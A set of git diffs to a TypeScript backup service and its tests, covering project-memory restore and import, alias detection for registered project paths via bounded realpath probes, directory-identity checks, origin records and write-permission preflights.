@@ -776,13 +779,19 @@ export class BackupService {
         );
       }
       claimedTargets.add(canonical);
-      planned.push({
-        candidate,
-        targetPath: resolved,
-        // Known up front when the target is already registered (directly or as an alias),
-        // so the preflight checks the memory scope the import will really write to.
-        registeredPath: this.resolveRegisteredProjectPath(resolved, canonical, registry),
-      });
+      // Known up front when the target is already registered (directly or as an alias),
+      // so the preflight checks the memory scope the import will really write to.
+      const registeredPath = this.resolveRegisteredProjectPath(resolved, canonical, registry);
+      // A project that a matched entry restores into in this same run cannot also take an
+      // import: the two would merge into one memory scope and the import's origin marker
+      // would displace the matched entry's identity.
+      if (matchedProjectPaths.has(registeredPath ?? resolved)) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': '${resolved}' already receives a backed-up project's memory in this restore`
+        );
+      }
+      planned.push({ candidate, targetPath: resolved, registeredPath });
     }
     return planned;
   }

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -4,6 +4,7 @@ import type { Config } from "@/node/config";
 import type { Result } from "@/common/types/result";
 import { Err, Ok } from "@/common/types/result";
 import { MutexMap } from "@/node/utils/concurrency/mutexMap";
+import { getProjectDisplayName } from "@/common/utils/subProjects";
 import {
   BackupOperationErrorSchema,
   type BackupCommandApproval,
@@ -144,6 +145,7 @@ export interface BackupProjectImporter {
  */
 export interface BackupProjectRegistrar {
   create(projectPath: string): Promise<Result<{ normalizedPath: string }, string>>;
+  setDisplayName(projectPath: string, displayName: string): Promise<void>;
 }
 
 /**
@@ -745,7 +747,7 @@ export class BackupService {
         targetPath: resolved,
         // Known up front when the target is already registered (directly or as an alias),
         // so the preflight checks the memory scope the import will really write to.
-        registeredPath: this.resolveRegisteredProjectPath(resolved, canonical),
+        registeredPath: await this.resolveRegisteredProjectPath(resolved, canonical),
       });
     }
     return planned;
@@ -763,7 +765,7 @@ export class BackupService {
     planned: readonly PlannedProjectImport[]
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
-    for (const { candidate, targetPath } of planned) {
+    for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
       // Once registration resolves the project identity, failures report that path: it is
       // where any partially written memory actually lives.
       let registeredPath: string | null = null;
@@ -791,14 +793,24 @@ export class BackupService {
           results.push(failed(`'${targetPath}' is not an existing directory`));
           continue;
         }
-        const created = await this.projectRegistrar.create(targetPath);
+        // An alias of an already registered project (resolved during planning) imports into
+        // that project without a second registration; create() would otherwise register the
+        // alias as a duplicate when its own duplicate check misses the aliased key.
+        const created =
+          plannedRegisteredPath === null
+            ? await this.projectRegistrar.create(targetPath)
+            : Err("Project already exists");
         if (created.success) {
           registeredPath = created.data.normalizedPath;
+          // The backed-up name travels with a newly registered project; an already
+          // registered target keeps its local name.
+          if (candidate.name !== getProjectDisplayName(registeredPath)) {
+            await this.projectRegistrar.setDisplayName(registeredPath, candidate.name);
+          }
         } else if (created.error === "Project already exists") {
-          registeredPath = this.resolveRegisteredProjectPath(
-            targetPath,
-            await realpathOrNull(targetPath)
-          );
+          registeredPath =
+            plannedRegisteredPath ??
+            (await this.resolveRegisteredProjectPath(targetPath, await realpathOrNull(targetPath)));
           if (registeredPath === null) {
             results.push(failed(`'${targetPath}' is already registered under a different path`));
             continue;
@@ -839,11 +851,21 @@ export class BackupService {
    * registered identity — writing under the alias would land files the project never
    * reads while reporting them as imported. Null when neither spelling is registered.
    */
-  private resolveRegisteredProjectPath(targetPath: string, canonicalPath: string | null) {
+  private async resolveRegisteredProjectPath(
+    targetPath: string,
+    canonicalPath: string | null
+  ): Promise<string | null> {
     const projects = this.config.loadConfigOrDefault().projects;
     const resolved = path.resolve(targetPath);
     if (projects.has(resolved)) return resolved;
-    if (canonicalPath !== null && projects.has(canonicalPath)) return canonicalPath;
+    if (canonicalPath === null) return null;
+    if (projects.has(canonicalPath)) return canonicalPath;
+    // Registered keys may themselves be aliases (a project added through a symlinked
+    // parent), so the target's real path is compared with each registered project's real
+    // path rather than only looked up literally.
+    for (const registered of projects.keys()) {
+      if ((await realpathOrNull(registered)) === canonicalPath) return registered;
+    }
     return null;
   }
 

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -7,6 +7,7 @@ import { MutexMap } from "@/node/utils/concurrency/mutexMap";
 import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
 import { getProjectDisplayName } from "@/common/utils/subProjects";
 import { isSystemProjectEntry } from "@/common/utils/systemProjects";
+import { MAX_BACKUP_PROJECT_PATH_CHARS } from "@/common/config/schemas/settingsBackup";
 import {
   BackupOperationErrorSchema,
   type BackupCommandApproval,
@@ -814,6 +815,15 @@ export class BackupService {
         );
       }
       const resolved = path.resolve(targetPath);
+      // The recovery copy a later matched restore of this project takes records the local
+      // path in the bundle manifest schema; a target past its cap would import today and
+      // fail every restore that later matches it, after the core snapshot.
+      if (resolved.length > MAX_BACKUP_PROJECT_PATH_CHARS) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': the target path is longer than ${MAX_BACKUP_PROJECT_PATH_CHARS} characters`
+        );
+      }
       const stat = await fs.lstat(resolved).catch(() => null);
       // A symlinked target would register the link's path while memory lands under a dir
       // name derived from it; require the plain directory itself.
@@ -1059,10 +1069,13 @@ export class BackupService {
    * Registered user projects and their real paths. Resolved once per restore, then extended
    * for import execution with only the projects registered since (`previous` supplies the
    * rest): per-candidate resolution would cost registered × approved filesystem calls.
-   * Real paths are probed in parallel under one deadline for the whole pass, so a project
-   * on an unavailable mount cannot make the restore look hung or hold the registration lock
-   * for as long as that mount blocks; a project probed after the deadline records no real
-   * path and is matched by its registered spelling only.
+   * Real paths are probed under one deadline for the whole pass, so a project on an
+   * unavailable mount cannot make the restore look hung or hold the registration lock for
+   * as long as that mount blocks; a project probed after the deadline records no real path
+   * and is matched by its registered spelling only. That is safe for alias detection in all
+   * but one exotic case: an import target resolved, so its directory is reachable, and a
+   * registered spelling of that same directory can only be unreachable through a symlink
+   * that itself sits on an unavailable mount.
    */
   private async registeredProjectLookup(
     previous?: RegisteredProjectLookup
@@ -1075,8 +1088,11 @@ export class BackupService {
     const canonicalByKey = new Map<string, string | null>();
     const pending: string[] = [];
     for (const key of keys) {
+      // Only resolved paths carry over: a key the planning pass could not resolve in time
+      // is probed again, so a transient stall does not leave an alias undetected at the
+      // moment an import decides whether to register.
       const known = previous?.canonicalByKey.get(key);
-      if (known !== undefined) canonicalByKey.set(key, known);
+      if (known != null) canonicalByKey.set(key, known);
       else pending.push(key);
     }
     const probes = new AsyncSemaphore(REGISTRY_CANONICALIZE_CONCURRENCY);

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -196,12 +196,16 @@ interface RegisteredProjectLookup {
 /**
  * Bounds on resolving registered projects' real paths; see registeredProjectLookup. One probe
  * in flight, deliberately: Node's fs has no cancellation, so a `realpath` that a timed-out
- * race stopped waiting for keeps its libuv threadpool worker until the mount answers. With
- * one at a time, an unavailable mount can hold at most one of the pool's threads, not the
- * whole pool; the deadline bounds how long the restore itself waits.
+ * race stopped waiting for keeps its libuv threadpool worker until the mount answers. The
+ * deadline bounds how long the restore itself waits, shared out equally among the keys still
+ * to probe rather than spent by whichever comes first, so a project on an unavailable mount
+ * cannot leave every key after it unprobed. Each stalled probe is one worker held until its
+ * mount answers; after REGISTRY_MAX_STALLED_PROBES of them the pass stops probing, so a
+ * pass can hold at most that many of the pool's threads, not the whole pool.
  */
 const REGISTRY_CANONICALIZE_CONCURRENCY = 1;
 const REGISTRY_CANONICALIZE_DEADLINE_MS = 5_000;
+const REGISTRY_MAX_STALLED_PROBES = 2;
 
 /**
  * One approved import after planning: its resolved target, the directory's filesystem
@@ -348,18 +352,24 @@ async function realpathOrNull(target: string): Promise<string | null> {
 }
 
 /**
- * `realpathOrNull` bounded by `timeoutMs`: null once the time is up. A resolution still
- * blocked on an unavailable mount then finishes on its own in the threadpool; nothing waits
- * for it, and REGISTRY_CANONICALIZE_CONCURRENCY keeps such leftovers to one at a time.
+ * `realpathOrNull` bounded by `timeoutMs`; `stalled` when the time ran out first. A
+ * resolution still blocked on an unavailable mount then finishes on its own in the
+ * threadpool; nothing waits for it (see REGISTRY_MAX_STALLED_PROBES).
  */
-async function realpathWithin(target: string, timeoutMs: number): Promise<string | null> {
-  if (timeoutMs <= 0) return null;
+async function realpathWithin(
+  target: string,
+  timeoutMs: number
+): Promise<{ canonical: string | null; stalled: boolean }> {
+  if (timeoutMs <= 0) return { canonical: null, stalled: false };
   let timer: ReturnType<typeof setTimeout> | undefined;
-  const expired = new Promise<null>((resolve) => {
-    timer = setTimeout(() => resolve(null), timeoutMs);
+  const expired = new Promise<{ canonical: null; stalled: true }>((resolve) => {
+    timer = setTimeout(() => resolve({ canonical: null, stalled: true }), timeoutMs);
   });
   try {
-    return await Promise.race([realpathOrNull(target), expired]);
+    return await Promise.race([
+      realpathOrNull(target).then((canonical) => ({ canonical, stalled: false })),
+      expired,
+    ]);
   } finally {
     clearTimeout(timer);
   }
@@ -1158,11 +1168,25 @@ export class BackupService {
     }
     const probes = new AsyncSemaphore(REGISTRY_CANONICALIZE_CONCURRENCY);
     const deadline = Date.now() + REGISTRY_CANONICALIZE_DEADLINE_MS;
+    let unprobed = pending.length;
+    let stalled = 0;
     await Promise.all(
       pending.map(async (key) => {
         const slot = await probes.acquire();
         try {
-          canonicalByKey.set(key, await realpathWithin(key, deadline - Date.now()));
+          // An equal share of the time left for each key still to probe, not all of it: a
+          // key on an unavailable mount would otherwise use up the pass and leave every key
+          // after it unprobed — at planning and, in the same order, again at execution, so
+          // an alias of the import target behind it would never be seen and the target
+          // registered as a second spelling of one directory.
+          const budget =
+            stalled < REGISTRY_MAX_STALLED_PROBES
+              ? Math.ceil((deadline - Date.now()) / unprobed)
+              : 0;
+          unprobed -= 1;
+          const probe = await realpathWithin(key, budget);
+          if (probe.stalled) stalled += 1;
+          canonicalByKey.set(key, probe.canonical);
         } finally {
           slot.release();
         }

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -637,7 +637,7 @@ export class BackupService {
         // Re-verify under the local payload lock: the preflight ran before the snapshot and
         // the directory may have vanished since.
         const stat = await fs.lstat(targetPath).catch(() => null);
-        if (stat === null || !stat.isDirectory()) {
+        if (!stat?.isDirectory()) {
           results.push(failed(`'${targetPath}' is not an existing directory`));
           continue;
         }

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -4,7 +4,9 @@ import type { Config } from "@/node/config";
 import type { Result } from "@/common/types/result";
 import { Err, Ok } from "@/common/types/result";
 import { MutexMap } from "@/node/utils/concurrency/mutexMap";
+import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
 import { getProjectDisplayName } from "@/common/utils/subProjects";
+import { isSystemProjectEntry } from "@/common/utils/systemProjects";
 import {
   BackupOperationErrorSchema,
   type BackupCommandApproval,
@@ -181,15 +183,32 @@ export interface BackupMemoryNotifier {
 
 /** Registered project keys plus a real-path → key index, built once per restore. */
 interface RegisteredProjectLookup {
+  /** Registered user projects (system entries excluded: memory is never kept for them). */
   keys: ReadonlySet<string>;
+  /** Each key's real path, or null when it could not be resolved in time. */
+  canonicalByKey: ReadonlyMap<string, string | null>;
   byCanonical: ReadonlyMap<string, string>;
 }
 
-/** One approved import after planning: its resolved target and, if already registered, its identity. */
+/** Bounds on resolving registered projects' real paths; see registeredProjectLookup. */
+const REGISTRY_CANONICALIZE_CONCURRENCY = 8;
+const REGISTRY_CANONICALIZE_DEADLINE_MS = 5_000;
+
+/**
+ * One approved import after planning: its resolved target, the directory's filesystem
+ * identity at approval, and, if already registered, the project identity it imports into.
+ */
 interface PlannedProjectImport {
   candidate: BackupProjectImport;
   targetPath: string;
+  targetIdentity: { dev: number; ino: number };
   registeredPath: string | null;
+}
+
+/** planProjectImports' result: the imports and the registry lookup they were resolved against. */
+interface PlannedProjectImports {
+  imports: PlannedProjectImport[];
+  registry: RegisteredProjectLookup | null;
 }
 
 export interface BackupServiceDependencies {
@@ -317,6 +336,24 @@ function isNetworkOrDevicePath(targetPath: string): boolean {
 
 async function realpathOrNull(target: string): Promise<string | null> {
   return fs.realpath(target).catch(() => null);
+}
+
+/**
+ * `realpathOrNull` bounded by `timeoutMs`: null once the time is up. A resolution still
+ * blocked on an unavailable mount then finishes on its own in the threadpool; nothing
+ * waits for it.
+ */
+async function realpathWithin(target: string, timeoutMs: number): Promise<string | null> {
+  if (timeoutMs <= 0) return null;
+  let timer: ReturnType<typeof setTimeout> | undefined;
+  const expired = new Promise<null>((resolve) => {
+    timer = setTimeout(() => resolve(null), timeoutMs);
+  });
+  try {
+    return await Promise.race([realpathOrNull(target), expired]);
+  } finally {
+    clearTimeout(timer);
+  }
 }
 
 function repoLockKey(settings: SettingsBackupInput): string {
@@ -624,7 +661,7 @@ export class BackupService {
         // Import approvals are also checked before the snapshot and before any mutation: a
         // stale token or an unusable target directory refuses the whole restore while
         // nothing has changed yet. Runtime failures after this point are per-candidate.
-        const plannedImports = await this.planProjectImports(
+        const { imports: plannedImports, registry } = await this.planProjectImports(
           requestedImports,
           validated.projectImports,
           validated.matchedProjects,
@@ -678,7 +715,9 @@ export class BackupService {
           // nothing that can fail may run after them and discard those results.
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           const projectImportResults =
-            importer === null ? [] : await this.executeProjectImports(importer, plannedImports);
+            importer === null
+              ? []
+              : await this.executeProjectImports(importer, plannedImports, registry);
           this.notifyProjectMemoryChanges([], projectImportResults);
           // A candidate whose import failed per-candidate stays on offer so the user can fix
           // the target and retry without another preview; its token is still current.
@@ -730,8 +769,8 @@ export class BackupService {
     candidates: readonly BackupProjectImport[],
     matched: readonly BackupMatchedProject[],
     includeProjects: boolean
-  ): Promise<PlannedProjectImport[]> {
-    if (requested.length === 0) return [];
+  ): Promise<PlannedProjectImports> {
+    if (requested.length === 0) return { imports: [], registry: null };
     if (!includeProjects) {
       throw new BackupServiceError(
         "IO_ERROR",
@@ -801,9 +840,16 @@ export class BackupService {
           `Cannot import '${candidate.name}': '${resolved}' already receives a backed-up project's memory in this restore`
         );
       }
-      planned.push({ candidate, targetPath: resolved, registeredPath });
+      planned.push({
+        candidate,
+        targetPath: resolved,
+        // The directory itself, not just its name: execution refuses a different directory
+        // that has since taken this path (the checkout moved away, another created here).
+        targetIdentity: { dev: stat.dev, ino: stat.ino },
+        registeredPath,
+      });
     }
-    return planned;
+    return { imports: planned, registry };
   }
 
   /**
@@ -815,7 +861,8 @@ export class BackupService {
    */
   private async executeProjectImports(
     importer: BackupProjectImporter,
-    planned: readonly PlannedProjectImport[]
+    planned: readonly PlannedProjectImport[],
+    planningRegistry: RegisteredProjectLookup | null
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
     if (planned.length === 0) return results;
@@ -838,8 +885,15 @@ export class BackupService {
     // between that read and the memory writes, so the project an import wrote into is the
     // project registered when it reports success.
     return registrar.withRegistrationLock(async (locked) => {
-      const registry = await this.registeredProjectLookup();
-      for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
+      // Real paths resolved during planning are reused; only projects registered since are
+      // probed, so a slow mount is waited on once per restore, not again under this lock.
+      const registry = await this.registeredProjectLookup(planningRegistry ?? undefined);
+      for (const {
+        candidate,
+        targetPath,
+        targetIdentity,
+        registeredPath: plannedRegisteredPath,
+      } of planned) {
         // The identity the preflight checked (memory limits, non-file destinations,
         // permissions) is the only one this import may write to. A different identity now —
         // the checkout registered under another alias since planning — names a memory scope
@@ -869,8 +923,18 @@ export class BackupService {
           // Re-verify under the local payload lock: the preflight ran before the snapshot and
           // the directory may have vanished since.
           const stat = await fs.lstat(targetPath).catch(() => null);
-          if (!stat?.isDirectory()) {
+          if (!stat?.isDirectory() || stat.isSymbolicLink()) {
             results.push(failed(`'${targetPath}' is not an existing directory`));
+            continue;
+          }
+          // The same directory the user approved, not merely one at the same path: a checkout
+          // moved away and another created here since would otherwise be registered and
+          // receive the approved source's memory. create() re-resolves the path itself, so
+          // a swap after this check remains a race this pinning narrows rather than closes.
+          if (stat.dev !== targetIdentity.dev || stat.ino !== targetIdentity.ino) {
+            results.push(
+              failed(`'${targetPath}' was replaced by a different directory since it was approved`)
+            );
             continue;
           }
           // An alias of an already registered project imports into that project without a
@@ -970,18 +1034,48 @@ export class BackupService {
   }
 
   /**
-   * Registered project keys and their real paths, resolved once per phase (planning, then
-   * import execution): resolving them per candidate would cost registered × approved
-   * filesystem calls, and registered paths on slow mounts would make the restore look hung.
+   * Registered user projects and their real paths. Resolved once per restore, then extended
+   * for import execution with only the projects registered since (`previous` supplies the
+   * rest): per-candidate resolution would cost registered × approved filesystem calls.
+   * Real paths are probed in parallel under one deadline for the whole pass, so a project
+   * on an unavailable mount cannot make the restore look hung or hold the registration lock
+   * for as long as that mount blocks; a project probed after the deadline records no real
+   * path and is matched by its registered spelling only.
    */
-  private async registeredProjectLookup(): Promise<RegisteredProjectLookup> {
-    const keys = new Set(this.config.loadConfigOrDefault().projects.keys());
-    const byCanonical = new Map<string, string>();
-    for (const registered of keys) {
-      const canonical = await realpathOrNull(registered);
-      if (canonical !== null && !byCanonical.has(canonical)) byCanonical.set(canonical, registered);
+  private async registeredProjectLookup(
+    previous?: RegisteredProjectLookup
+  ): Promise<RegisteredProjectLookup> {
+    const keys = new Set(
+      [...this.config.loadConfigOrDefault().projects.entries()]
+        .filter(([projectPath, projectConfig]) => !isSystemProjectEntry(projectPath, projectConfig))
+        .map(([projectPath]) => projectPath)
+    );
+    const canonicalByKey = new Map<string, string | null>();
+    const pending: string[] = [];
+    for (const key of keys) {
+      const known = previous?.canonicalByKey.get(key);
+      if (known !== undefined) canonicalByKey.set(key, known);
+      else pending.push(key);
     }
-    return { keys, byCanonical };
+    const probes = new AsyncSemaphore(REGISTRY_CANONICALIZE_CONCURRENCY);
+    const deadline = Date.now() + REGISTRY_CANONICALIZE_DEADLINE_MS;
+    await Promise.all(
+      pending.map(async (key) => {
+        const slot = await probes.acquire();
+        try {
+          canonicalByKey.set(key, await realpathWithin(key, deadline - Date.now()));
+        } finally {
+          slot.release();
+        }
+      })
+    );
+    // Sorted so the project a shared real path resolves to does not depend on probe timing.
+    const byCanonical = new Map<string, string>();
+    for (const key of [...keys].sort()) {
+      const canonical = canonicalByKey.get(key);
+      if (canonical != null && !byCanonical.has(canonical)) byCanonical.set(canonical, key);
+    }
+    return { keys, canonicalByKey, byCanonical };
   }
 
   /** One notification per project whose memory changed; failed imports' partial writes count too. */

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -726,11 +726,15 @@ export class BackupService {
               ? []
               : await this.executeProjectImports(importer, plannedImports, registry);
           this.notifyProjectMemoryChanges([], projectImportResults);
-          // A candidate whose import failed per-candidate stays on offer so the user can fix
-          // the target and retry without another preview; its token is still current.
-          const failedTokens = new Set(
+          // A candidate whose import failed per-candidate, or landed only partly because
+          // existing files conflicted, stays on offer so the user can fix the target or the
+          // conflicts and retry without another preview; its token is still current, and a
+          // conflicted import records no origin, so the source is still an import candidate.
+          const stillOfferedTokens = new Set(
             projectImportResults.flatMap((result, index) =>
-              result.status === "failed" ? [plannedImports[index]?.candidate.token] : []
+              result.status === "failed" || result.skippedFiles.length > 0
+                ? [plannedImports[index]?.candidate.token]
+                : []
             )
           );
           return Ok({
@@ -742,7 +746,9 @@ export class BackupService {
             projectBundleSkipped: restored.projectBundleSkipped,
             unapprovedProjectImports: [
               ...unapprovedProjectImports,
-              ...validated.projectImports.filter((candidate) => failedTokens.has(candidate.token)),
+              ...validated.projectImports.filter((candidate) =>
+                stillOfferedTokens.has(candidate.token)
+              ),
             ],
           });
         } catch (error) {
@@ -936,6 +942,20 @@ export class BackupService {
             `'${targetPath}' is now registered as '${registered}', which this import was not checked against; approve it again`
           );
         try {
+          // Reclassified since validation: the candidate's recorded source path is registered
+          // on this machine now, so every later restore writes the entry directly into that
+          // project — memory imported into the approved target would be orphaned there and
+          // its origin record overridden by the exact-path match. Refused under the
+          // registration lock, where this cannot change again before the write; the next
+          // preview shows the entry as matched.
+          if (registry.keys.has(candidate.sourcePath)) {
+            results.push(
+              failed(
+                `'${candidate.sourcePath}' was registered on this machine since the preview and is now restored directly; preview again`
+              )
+            );
+            continue;
+          }
           // Re-verify under the local payload lock: the preflight ran before the snapshot and
           // the directory may have vanished since.
           const stat = await fs.lstat(targetPath).catch(() => null);

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -224,6 +224,21 @@ function toOperationError(error: unknown): BackupOperationError {
     };
   }
 
+  // A matched-memory write that failed midway may have created files no snapshot can
+  // remove (the snapshot holds only pre-existing destinations); the error lists them as
+  // the user's cleanup list.
+  if (error instanceof ProjectMemoryRestoreError) {
+    const written = error.restoredProjectMemory.flatMap((restored) => restored.files);
+    return {
+      code: "IO_ERROR",
+      message:
+        written.length === 0
+          ? error.message
+          : `${error.message}. Project memory written before the failure`,
+      ...(written.length === 0 ? {} : { files: written }),
+    };
+  }
+
   // Same round trip for project imports: the error carries the candidates recomputed from
   // the currently checked-out payload, so a stale approval can be re-made from fresh data.
   if (error instanceof BackupProjectImportApprovalRequiredError) {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3693,6 +3693,24 @@ describe("project bundle", () => {
     expect(planProjectBundleRestore(bundle, new Map(), origins).imports).toHaveLength(1);
   });
 
+  it("lets one local project receive at most one bundle entry", async () => {
+    // Source A was imported to local path B earlier; a later bundle also records B itself.
+    const sourceA = entryFor("/home/dev/src/alpha");
+    const localB = "/home/other/checkouts/beta";
+    const entryB = entryFor(localB);
+    await writeFixtureFile(muxRoot, `memory/project/${sourceA.memoryDir}/a.md`, "a\n");
+    await writeFixtureFile(muxRoot, `memory/project/${entryB.memoryDir}/b.md`, "b\n");
+    const bundle = await collectProjectBundle(muxRoot, [sourceA, entryB]);
+    const registered = new Map([[localB, entryB.memoryDir]]);
+    const origins = new Map([[sourceA.path, { projectPath: localB, memoryDir: entryB.memoryDir }]]);
+
+    const plan = planProjectBundleRestore(bundle, registered, origins);
+    // The exact-path entry keeps the project; the imported-origin entry is re-offered rather
+    // than merged into the same memory scope.
+    expect(plan.matched.map((match) => match.entry.path)).toEqual([localB]);
+    expect(plan.imports.map((item) => item.entry.path)).toEqual([sourceA.path]);
+  });
+
   it("ignores origin markers that are unreadable or claim a source twice", async () => {
     const first = "/home/other/a";
     const second = "/home/other/b";

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3718,6 +3718,12 @@ describe("project bundle", () => {
     return path.join(muxRoot, "memory", ".backup-origins", `${digest.slice(0, 32)}.json`);
   }
 
+  /** The project-side record of the same association (keyed by the memory dir's hash). */
+  function originTargetPath(memoryDir: string): string {
+    const digest = createHash("sha256").update(Buffer.from(memoryDir, "utf-8")).digest("hex");
+    return path.join(muxRoot, "memory", ".backup-origins", `target-${digest.slice(0, 32)}.json`);
+  }
+
   it("replaces a source's association when it is imported again elsewhere", async () => {
     const source = "/home/dev/src/alpha";
     const b = "/home/other/b";
@@ -3727,13 +3733,26 @@ describe("project bundle", () => {
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(c), source);
     const registered = new Map([b, c].map((project) => [project, projectMemoryDirName(project)]));
 
-    // One marker per source, so C's import replaced B's claim outright: re-registering B
+    // One record per source, so C's import replaced B's claim outright: re-registering B
     // cannot revive the older association or leave the source claimed twice.
-    expect(await fs.readdir(path.join(muxRoot, "memory", ".backup-origins"))).toEqual([
-      path.basename(originMarkerPath(source)),
-    ]);
     expect([...(await readProjectMemoryOrigins(muxRoot, registered, [source])).entries()]).toEqual([
       [source, { projectPath: c, memoryDir: projectMemoryDirName(c) }],
+    ]);
+  });
+
+  it("voids a project's previous source when another source is imported into it", async () => {
+    const a = "/home/dev/src/alpha";
+    const c = "/home/dev/src/gamma";
+    const b = "/home/other/b";
+    const registered = new Map([[b, projectMemoryDirName(b)]]);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), a);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), c);
+
+    // A's own record still names B, but B's record now names C: without the project's side
+    // confirming it, A would match B and overwrite it in matched mode on the next restore,
+    // or manifest order would pick which of the two claimed B.
+    expect([...(await readProjectMemoryOrigins(muxRoot, registered, [a, c])).entries()]).toEqual([
+      [c, { projectPath: b, memoryDir: projectMemoryDirName(b) }],
     ]);
   });
 
@@ -3759,7 +3778,12 @@ describe("project bundle", () => {
       projectPath: b,
       memoryDir: projectMemoryDirName(b),
     });
-    expect(await fs.readdir(originsDir)).toEqual([path.basename(originMarkerPath(source))]);
+    // Nothing half-written: the source's record, B's record, and no staging leftovers.
+    expect((await fs.readdir(originsDir)).sort()).toEqual(
+      [originMarkerPath(source), originTargetPath(projectMemoryDirName(b))]
+        .map((file) => path.basename(file))
+        .sort()
+    );
   });
 
   it("ignores markers that are broken, mis-named, or name an unregistered project", async () => {
@@ -3781,11 +3805,23 @@ describe("project bundle", () => {
       JSON.stringify({ sourcePath: orphaned, memoryDir: projectMemoryDirName("/gone") }),
       "utf-8"
     );
+    // A source record whose project never confirmed it (an import that failed between the
+    // two writes, or a hand-placed file).
+    const unconfirmed = "/home/dev/src/unconfirmed";
+    await fs.writeFile(
+      originMarkerPath(unconfirmed),
+      JSON.stringify({
+        sourcePath: unconfirmed,
+        memoryDir: projectMemoryDirName(registeredProject),
+      }),
+      "utf-8"
+    );
 
     const origins = await readProjectMemoryOrigins(muxRoot, registered, [
       broken,
       misnamed,
       orphaned,
+      unconfirmed,
     ]);
     expect(origins.size).toBe(0);
   });

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -4016,7 +4016,12 @@ describe("project bundle", () => {
       expect(error).toBeInstanceOf(ProjectMemoryWriteError);
       const writeError = error as ProjectMemoryWriteError;
       expect(writeError.message).toContain("disk fault");
-      expect(writeError.written).toEqual([`memory/project/${targetDir}/first.md`]);
+      // The attempted file is listed too: a write can fail after creating or truncating
+      // its destination, and the cleanup list must not omit it.
+      expect(writeError.written).toEqual([
+        `memory/project/${targetDir}/first.md`,
+        `memory/project/${targetDir}/faulty/inner.md`,
+      ]);
       expect(writeError.skipped).toEqual([`memory/project/${targetDir}/kept.md`]);
     } finally {
       mkdir.mockRestore();

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -21,6 +21,7 @@ import {
   PROJECT_BUNDLE_DIR,
   ProjectMemoryWriteError,
   REDACTED_BACKUP_VALUE,
+  assertProjectMemoryWritesAllowed,
   backupCommandApprovalToken,
   backupSecretApprovalDigest,
   collectAllowlistedFiles,
@@ -4208,6 +4209,70 @@ describe("project bundle", () => {
         })
       );
       expect((error as Error).message).toContain("disallowed path");
+    }
+  });
+
+  it("preflights the permission each memory write will actually need", async () => {
+    if (process.platform === "win32" || process.getuid?.() === 0) return;
+    const scope = `memory/project/${projectMemoryDirName("/home/dev/target")}`;
+    await writeFixtureFile(muxRoot, `${scope}/same.md`, "same\n");
+    await writeFixtureFile(muxRoot, `${scope}/differs.md`, "local\n");
+    const scopeAbs = path.join(muxRoot, ...scope.split("/"));
+    const sameAbs = path.join(scopeAbs, "same.md");
+    const differsAbs = path.join(scopeAbs, "differs.md");
+    await fs.chmod(sameAbs, 0o444);
+    await fs.chmod(differsAbs, 0o444);
+    const identical = { path: `${scope}/same.md`, content: Buffer.from("same\n") };
+    const differing = { path: `${scope}/differs.md`, content: Buffer.from("backup\n") };
+    try {
+      // Never opened for writing in either mode, so a read-only identical file is fine.
+      await assertProjectMemoryWritesAllowed(muxRoot, [identical], { addOnly: false });
+      // Add-only skips a differing destination as a conflict; its permissions are moot.
+      await assertProjectMemoryWritesAllowed(muxRoot, [differing], { addOnly: true });
+      // Matched mode overwrites it, so the refusal belongs to the preflight, not the write.
+      const readOnly = await captureRejection(
+        assertProjectMemoryWritesAllowed(muxRoot, [differing], { addOnly: false })
+      );
+      expect((readOnly as Error).message).toContain("not writable");
+      // A new file needs a directory that accepts entries.
+      await fs.chmod(scopeAbs, 0o555);
+      try {
+        const parent = await captureRejection(
+          assertProjectMemoryWritesAllowed(
+            muxRoot,
+            [{ path: `${scope}/new.md`, content: Buffer.from("x\n") }],
+            { addOnly: true }
+          )
+        );
+        expect((parent as Error).message).toContain("not writable");
+      } finally {
+        await fs.chmod(scopeAbs, 0o755);
+      }
+    } finally {
+      await fs.chmod(sameAbs, 0o644);
+      await fs.chmod(differsAbs, 0o644);
+    }
+  });
+
+  it("propagates an unreadable memory scope instead of treating it as empty", async () => {
+    if (process.platform === "win32" || process.getuid?.() === 0) return;
+    const scope = `memory/project/${projectMemoryDirName("/home/dev/target")}`;
+    await writeFixtureFile(muxRoot, `${scope}/notes.md`, "local\n");
+    const scopeAbs = path.join(muxRoot, ...scope.split("/"));
+    await fs.chmod(scopeAbs, 0o000);
+    try {
+      // Read as "empty", the scope would pass the count cap and the write would fail
+      // only after the core settings had changed.
+      const error = await captureRejection(
+        assertProjectMemoryWritesAllowed(
+          muxRoot,
+          [{ path: `${scope}/new.md`, content: Buffer.from("x\n") }],
+          { addOnly: true }
+        )
+      );
+      expect((error as NodeJS.ErrnoException).code).toBe("EACCES");
+    } finally {
+      await fs.chmod(scopeAbs, 0o755);
     }
   });
 

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3601,6 +3601,21 @@ describe("project bundle", () => {
